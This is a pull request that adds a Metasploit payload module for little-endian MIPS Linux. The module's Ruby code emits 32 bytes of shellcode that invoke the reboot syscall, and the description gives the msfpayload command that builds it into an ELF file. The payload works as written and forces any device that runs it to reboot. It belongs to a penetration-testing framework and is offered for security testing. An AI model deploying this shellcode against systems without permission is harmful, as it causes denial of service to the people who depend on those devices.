### PR TITLE
mipsel reboot payload

### DIFF
--- a/modules/payloads/singles/linux/mipsle/reboot.rb
+++ b/modules/payloads/singles/linux/mipsle/reboot.rb
@@ -1,0 +1,52 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+module Metasploit3
+
+  include Msf::Payload::Single
+  include Msf::Payload::Linux
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'          => 'Linux reboot payload',
+      'Description'   => %q{
+                A very small shellcode for rebooting the system. 
+                This payload is sometimes helpfull for testing purposes.
+         },
+      'Author'        =>
+        [
+          'Michael Messner <devnull@s3cur1ty.de>', #metasploit payload
+          'rigan - <imrigan@gmail.com>'  #original payload
+        ],
+      'References'    => ['URL', 'http://www.shell-storm.org/shellcode/files/shellcode-795.php'],
+      'License'       => MSF_LICENSE,
+      'Platform'      => 'linux',
+      'Arch'          => ARCH_MIPSLE,
+      'Payload'       =>
+        {
+          'Offsets' => {} ,
+          'Payload' => ''
+        })
+    )
+  end
+
+  def generate
+
+    shellcode =
+	"\x21\x43\x06\x3c" +  #lui     a2,0x4321
+        "\xdc\xfe\xc6\x34" +  #ori     a2,a2,0xfedc
+        "\x12\x28\x05\x3c" +  #lui     a1,0x2812
+        "\x69\x19\xa5\x34" +  #ori     a1,a1,0x1969
+        "\xe1\xfe\x04\x3c" +  #lui     a0,0xfee1
+        "\xad\xde\x84\x34" +  #ori     a0,a0,0xdead
+        "\xf8\x0f\x02\x24" +  #li      v0,4088
+        "\x0c\x01\x01\x01"    #syscall 0x40404
+
+    return super + shellcode
+  end
+
+end


### PR DESCRIPTION
This payload is very small and for different testing purposes quite helpful.

The original shellcode is over here: http://www.shell-storm.org/shellcode/files/shellcode-795.php

Create it the following way:
# ./msfpayload linux/mipsle/reboot X > msf-reboot.elf

Created by msfpayload (http://www.metasploit.com).
Payload: linux/mipsle/reboot
 Length: 32
Options: {}

Let it run on a mipsel device (for example on a system in a qemu environment) and it should reboot ...
